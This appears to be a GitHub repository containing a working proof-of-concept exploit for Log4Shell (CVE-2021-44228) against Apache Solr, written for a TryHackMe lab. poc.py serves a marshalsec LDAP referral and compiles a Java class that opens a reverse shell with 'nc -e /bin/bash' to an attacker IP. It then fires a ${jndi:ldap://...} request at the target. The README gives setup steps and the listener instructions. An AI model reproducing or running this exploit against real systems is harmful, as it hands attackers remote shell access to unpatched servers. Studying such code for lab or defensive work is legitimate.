├── 1.png
├── 2.png
├── 4.png
├── README.md
└── poc.py


/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ab0x90/CVE-2021-44228_PoC/HEAD/1.png


--------------------------------------------------------------------------------
/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ab0x90/CVE-2021-44228_PoC/HEAD/2.png


--------------------------------------------------------------------------------
/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ab0x90/CVE-2021-44228_PoC/HEAD/4.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # POC for CVE-2021-44228
 2 | 
 3 | This python script was created while I was working on the TryHackMe room for [Log4j](https://tryhackme.com/room/solar). While this was created with default variables for this room, I used argparse to make the script versatile for a GET request.  All necessary varaibles can be changed with different options, see -h for more information.
 4 | 
 5 | 
 6 | # Setup
 7 | Only my script is hosted here, this requires two other downloads to run properly which I will give links for, but setting up the folders the way I did will allow the script to run without much effort. First create a log4j folder (or whatever name you want) then git clone this repo then move the poc.py into /log4j/.
 8 | 
 9 | ```sh
10 | git clone https://github.com/ab0x90/CVE-2021-44228_PoC.git
11 | ```
12 | 
13 | 
14 | Next clone [marshalsec](https://github.com/mbechler/marshalsec), in the same directory you just created. And then build it using maven.
15 | ```sh
16 | git clone https://github.com/mbechler/marshalsec.git
17 | cd marshalsec
18 | mvn clean package -DskipTests
19 | ```
20 | 
21 | 
22 | Lastly, you will need to [download](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html) some version of Java 8. For this script, and the default value for -j is 'jdk1.8.0_20'. 
23 | 
24 | The new directory should look like this when everything is extracted.
25 | ```sh
26 | kali@kali-[~/tools/Exploits/log4j]$ls -al
27 | total 338448
28 | drwxr-xr-x 5 kali kali      4096 Dec 14 15:22 .
29 | drwx------ 3 kali kali      4096 Dec 14 14:34 ..
30 | drwxr-xr-x 8 kali kali      4096 Jul 30  2014 jdk1.8.0_20
31 | drwxr-xr-x 5 kali kali      4096 Dec 14 14:40 marshalsec
32 | -rw-r--r-- 1 kali kali      2781 Dec 14 16:02 poc.py
33 | ```
34 | 
35 | After this setup is complete. Note that if you would like or need to use a different version of java this can be done using -j NAME_OF_JAVA_FOLDER.
36 | 
37 | # Usage
38 | 
39 | Help Menu
40 | 
41 | 
42 | ![](1.png)
43 | 
44 | 
45 | Included in the script is the payload provided in the THM room, change the IP/port to whatever you want to use. 
46 | 
47 | ![](2.png)
48 | 
49 | 
50 | Start a netcat listener to catch the shell on the port specified in the java_payload.
51 | 
52 | Start a python web server on port 8000
53 | 
54 | Example command:
55 | ```sh
56 | python3 poc.py -l 10.6.20.239 -i 10.10.64.53 -p 8983 
57 | ```
58 | 
59 | Example output and reverse shell:
60 | 
61 | 
62 | ![](4.png)
63 | 


--------------------------------------------------------------------------------
/poc.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | 
  3 | import requests
  4 | import os
  5 | import subprocess
  6 | import sys
  7 | import argparse
  8 | import threading
  9 | import time
 10 | from colorama import Fore
 11 | 
 12 | 
 13 | green = Fore.GREEN
 14 | red = Fore.RED
 15 | reset = Fore.RESET
 16 | 
 17 | 
 18 | 
 19 | 
 20 | def get_arguments():
 21 | 	parser = argparse.ArgumentParser(description='CVE-2021-44228 PoC for web requests')
 22 | 	parser.add_argument('-i', dest='ip_addr', type=str, help='IP address to target')
 23 | 	parser.add_argument('-j', dest='java', default='jdk1.8.0_20/bin/java', type=str, help='Java version to use')
 24 | 	parser.add_argument('-p', dest='rport', type=str, help='Remote port to target')
 25 | 	parser.add_argument('-u', dest='user_input', default='/solr/admin/cores?foo=', type=str, help='The vulnerable input point (the rest of the URL  ex: /solr/admin/cores?foo=)')
 26 | 	parser.add_argument('-l', dest='local_ip', type=str, help='The local IP address used for the crafted URL')
 27 | 	parser.add_argument('-L', dest='local_port', default='8000', type=str, help='The local port used to point at the python web server')
 28 | 	args = parser.parse_args()
 29 | 	return args
 30 | 
 31 | 
 32 | 
 33 | 
 34 | 
 35 | 
 36 | 
 37 | 
 38 | #CHANGE THIS IP ADDRESS OR ENTIRE PAYLOAD
 39 | java_payload = ("""
 40 | 
 41 | 	public class Exploit {
 42 |     static {
 43 |         try {
 44 |             java.lang.Runtime.getRuntime().exec("nc -e /bin/bash 10.6.20.239 9999");
 45 |         } catch (Exception e) {
 46 |             e.printStackTrace();
 47 |         }
 48 |     }
 49 | }
 50 | 
 51 | 
 52 | 
 53 | """)
 54 | 
 55 | 
 56 | 
 57 | 
 58 | #write the payload to a file
 59 | def write_payload():
 60 | 	with open("Exploit.java", "w") as f:
 61 | 		f.write(java_payload)
 62 | 		f.close()
 63 | 		print(red + "\n[+] " + reset + "Compiling the payload using javac\n")
 64 | 		os.system(f"./{args.java}c Exploit.java")
 65 | 		
 66 | 
 67 | #send the payload via a crafted URL
 68 | def send_payload():
 69 | 
 70 | 	#Craft jndi payload
 71 | 	jndi = "${jndi:ldap://" + args.local_ip + ":" + "1389/Exploit}"
 72 | 	print(jndi)
 73 | 
 74 | 	#Create the url and send the request
 75 | 	url = "http://" + args.ip_addr + ":" + args.rport + args.user_input + jndi
 76 | 	print(url)
 77 | 	send_exploit = requests.get(url)
 78 | 	
 79 | 
 80 | #starts the LDAPRefServer, run a python web server on port 8000 in the directory where the script is
 81 | def marshalsec():
 82 | 	#Compile the payload
 83 | 
 84 | 	#use marshalsec to run the LDAPRefServer
 85 | 	os.system(f"./{args.java} -cp marshalsec/target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://{args.local_ip}:8000/#Exploit")
 86 | 	
 87 | 
 88 | 
 89 | print(red + "\n****PoC for CVE-2021-44228****.")
 90 | print("Based on Apache Solr, change values as needed\n")
 91 | print("Make sure you are running a web server on port 8000(python works great)\nand running a netcat listener on the port specified in the java payload\n" + reset)
 92 | 
 93 | 
 94 | args = get_arguments()
 95 | 
 96 | print(red + "[+]" + reset + "Starting marshalsec LDAPRefServer\n")
 97 | threading.Thread(target=marshalsec).start()
 98 | time.sleep(3)
 99 | 
100 | print(red + "\n[+] " + reset + "Writing the payload to a file\n")
101 | write_payload()
102 | 
103 | 
104 | print(red + "\n[+]" + reset + "Sending the payload, check your listener\n")
105 | send_payload()
106 | 
107 | 
108 | 
109 | 
110 | 


--------------------------------------------------------------------------------